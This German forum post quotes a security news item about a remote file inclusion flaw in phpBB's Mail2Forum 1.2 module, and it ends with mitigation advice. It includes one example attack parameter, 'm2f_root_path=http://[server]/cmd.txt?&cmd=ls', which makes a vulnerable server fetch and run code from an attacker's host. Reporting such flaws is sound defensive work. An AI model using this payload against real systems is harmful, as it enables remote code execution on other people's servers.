dedie
| Zitat: |
| Für das optionale Mail2Forum-Modul der beliebten Forensoftware phpBB ist ein Exploit aufgetaucht, mit dem Angreifer das System kompromittieren können. Ursache des Problems ist die fehlerhafte Verarbeitung des Parameters m2f_root_path in Skripten wie m2f_forum.php, m2f_mailinglist.php und anderen, mit der sich beliebiger PHP-Code ausführen lässt. So kann ein Angreifer den Pfad m2f_root_path auf einen eigenen Server umbiegen (m2f_root_path=http://[server]/cmd.txt?&cmd=ls) und so seinen Schadcode auf dem verwundbaren phpBB-Server ausführen. Wie immer in solchen Fällen lässt sich die Lücke nur ausnutzen, wenn die Option register_globals aktiv ist. Betroffen soll die Version Mail2Forum 1.2 sein. Ein offizieller Patch steht nicht zur Vefügung, Anwender sollten register_globals ausschalten oder den Quellcode des Modul selbst editieren |
|
Weitere Infos so wie die Quelle